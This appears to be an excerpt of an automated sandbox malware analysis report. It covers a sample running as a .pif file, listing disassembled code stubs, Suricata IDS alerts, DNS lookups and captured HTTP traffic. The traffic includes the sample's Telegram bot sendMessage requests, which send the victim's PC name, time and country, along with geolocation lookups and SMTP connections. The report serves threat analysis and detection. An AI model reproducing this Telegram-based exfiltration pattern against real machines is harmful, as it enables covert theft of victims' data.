Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C3E26h	6_2_211C3B58
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C6A50h	6_2_211C6758
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CD848h	6_2_211CD550
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C1516h	6_2_211C1248
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CAD40h	6_2_211CAA48
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C030Eh	6_2_211C0040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C8238h	6_2_211C7F40
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C4746h	6_2_211C4478
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C7D70h	6_2_211C7A78
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CEB68h	6_2_211CE870
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C1E36h	6_2_211C1B68
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CC060h	6_2_211CBD68
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C0C07h	6_2_211C0960
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C9558h	6_2_211C9260
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C5107h	6_2_211C4D98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C6588h	6_2_211C6290
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C2756h	6_2_211C2488
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CD380h	6_2_211CD088
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CA878h	6_2_211CA580
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C1086h	6_2_211C0DB8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CA3B0h	6_2_211CA0B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C78A8h	6_2_211C75B0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C3076h	6_2_211C2DA8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CE6A0h	6_2_211CE3A8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CBB98h	6_2_211CB8A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C19A6h	6_2_211C16D8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CB6D0h	6_2_211CB3D8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C079Eh	6_2_211C04D0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C8BC8h	6_2_211C88D0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C3997h	6_2_211C36C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C60C0h	6_2_211C5DC8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CF9C0h	6_2_211CF6C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CCEB8h	6_2_211CCBC0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C22C6h	6_2_211C1FF8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CC9F0h	6_2_211CC6F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C9EE8h	6_2_211C9BF0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C42B6h	6_2_211C3FE8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211C73E0h	6_2_211C70E8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 211CE1D8h	6_2_211CDEE0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21201190h	6_2_21200E98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21200800h	6_2_21200508
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21200CC8h	6_2_212009D0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 21200338h	6_2_21200040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_21220006
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_21220040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_21220356
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then push 00000000h	6_2_212247AF
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 24A3F2B5h	10_2_24A3F0C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 24A3FC3Fh	10_2_24A3F0C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_24A3E5E8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 24A3E0C5h	10_2_24A3E114
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_24A3EC1B
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_24A3EDFB
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 24A3E0C5h	10_2_24A3DF07
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFD6A9h	10_2_25BFD400
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BF1868h	10_2_25BF1448
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BF10F1h	10_2_25BF0E40
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFEC61h	10_2_25BFE9B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFB841h	10_2_25BFB598
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFBC99h	10_2_25BFB9F0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFE3B1h	10_2_25BFE108
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFE809h	10_2_25BFE560
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFDF59h	10_2_25BFDCB0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BF1868h	10_2_25BF1439
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFDB01h	10_2_25BFD858
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFD251h	10_2_25BFCFA8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BF1868h	10_2_25BF1796
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFFDC1h	10_2_25BFFB18
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFCDF9h	10_2_25BFCB50
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFC549h	10_2_25BFC2A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFC9A1h	10_2_25BFC6F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFF969h	10_2_25BFF6C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFF0B9h	10_2_25BFEE10
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFF511h	10_2_25BFF268
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25BFC0F1h	10_2_25BFBE48
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C068FDh	10_2_25C065C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C07DC0h	10_2_25C07AF0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0D346h	10_2_25C0D078
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C04471h	10_2_25C041C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0EEA6h	10_2_25C0EBD8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0CEB6h	10_2_25C0CBE8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0AEC6h	10_2_25C0ABF8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C018A1h	10_2_25C015F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0FC56h	10_2_25C0F988
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0DC66h	10_2_25C0D998
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C01449h	10_2_25C011A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0BC76h	10_2_25C0B9A8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then mov esp, ebp	10_2_25C09BAA
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C00FF1h	10_2_25C00D48
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0EA16h	10_2_25C0E748
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0CA26h	10_2_25C0C758
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0AA36h	10_2_25C0A768
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C06411h	10_2_25C06168
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0701Ah	10_2_25C06F69
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C04019h	10_2_25C03D70
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0701Ah	10_2_25C06F70
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0D7D6h	10_2_25C0D508
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C05FB9h	10_2_25C05D10
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C03BC1h	10_2_25C03918
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0B7E6h	10_2_25C0B518
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C03769h	10_2_25C034C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0C596h	10_2_25C0C2C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0517Bh	10_2_25C04ED0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0A5A6h	10_2_25C0A2D8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C00B99h	10_2_25C008F0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0F7C6h	10_2_25C0F4F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0B356h	10_2_25C0B088
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C00741h	10_2_25C00498
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C02151h	10_2_25C01EA8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0E586h	10_2_25C0E2B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C05B61h	10_2_25C058B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C002E9h	10_2_25C00040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C01CF9h	10_2_25C01A50
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C05709h	10_2_25C05460
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C03311h	10_2_25C03068
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0F336h	10_2_25C0F068
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C04D21h	10_2_25C04A78
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C048C9h	10_2_25C04620
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0E0F6h	10_2_25C0DE28
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C0C106h	10_2_25C0BE38
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7E1D8h	10_2_25C7DEE0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C75730h	10_2_25C75438
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7CEB8h	10_2_25C7CBC0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C73997h	10_2_25C736C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C760C0h	10_2_25C75DC8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7F9C0h	10_2_25C7F6C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7079Eh	10_2_25C704D0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C78BC8h	10_2_25C788D0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C719A6h	10_2_25C716D8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7B6D0h	10_2_25C7B3D8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C742B6h	10_2_25C73FE8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C773E0h	10_2_25C770E8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C79EE8h	10_2_25C79BF0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C722C6h	10_2_25C71FF8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7C9F0h	10_2_25C7C6F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7A878h	10_2_25C7A580
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C72756h	10_2_25C72488
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7D380h	10_2_25C7D088
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C76588h	10_2_25C76290
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C75107h	10_2_25C74D98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C79090h	10_2_25C78D98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7BB98h	10_2_25C7B8A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C73076h	10_2_25C72DA8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7E6A0h	10_2_25C7E3A8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C778A8h	10_2_25C775B0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C71086h	10_2_25C70DB8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7A3B0h	10_2_25C7A0B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7030Eh	10_2_25C70040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C78238h	10_2_25C77F40
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C71516h	10_2_25C71248
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7AD40h	10_2_25C7AA48
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7D848h	10_2_25C7D550
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C73E26h	10_2_25C73B58
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C76A50h	10_2_25C76758
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C70C07h	10_2_25C70960
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C79558h	10_2_25C79260
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C71E36h	10_2_25C71B68
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7C060h	10_2_25C7BD68
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7EB68h	10_2_25C7E870
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C74746h	10_2_25C74478
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C77D70h	10_2_25C77A78
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C75BF8h	10_2_25C75900
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7F4F9h	10_2_25C7F200
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C74BD6h	10_2_25C74908
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C78700h	10_2_25C78408
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7B208h	10_2_25C7AF10
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C72BE6h	10_2_25C72918
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7DD10h	10_2_25C7DA18
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C76F18h	10_2_25C76C20
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C79A20h	10_2_25C79728
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7C528h	10_2_25C7C230
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C73506h	10_2_25C73238
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25C7F030h	10_2_25C7ED38
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25CB1190h	10_2_25CB0E98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25CB0CC8h	10_2_25CB09D0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25CB0800h	10_2_25CB0508
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then jmp 25CB0338h	10_2_25CB0040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then push 00000000h	10_2_25CD47AF
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_25CD0040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_25CD0037
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	10_2_25CD0356
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	10_2_26394C9C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49756 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49784 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49792 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.4:49773 -> 46.151.208.21:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2019/02/2025%20/%2002:40:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2019/02/2025%20/%2002:58:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2019/02/2025%20/%2004:09:57%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: NASHIRNET-ASNNASHIRNETASNSA NASHIRNET-ASNNASHIRNETASNSA

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49768 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49757 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49761 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49746 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49760 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49783 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49791 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49769 -> 104.21.32.1:443
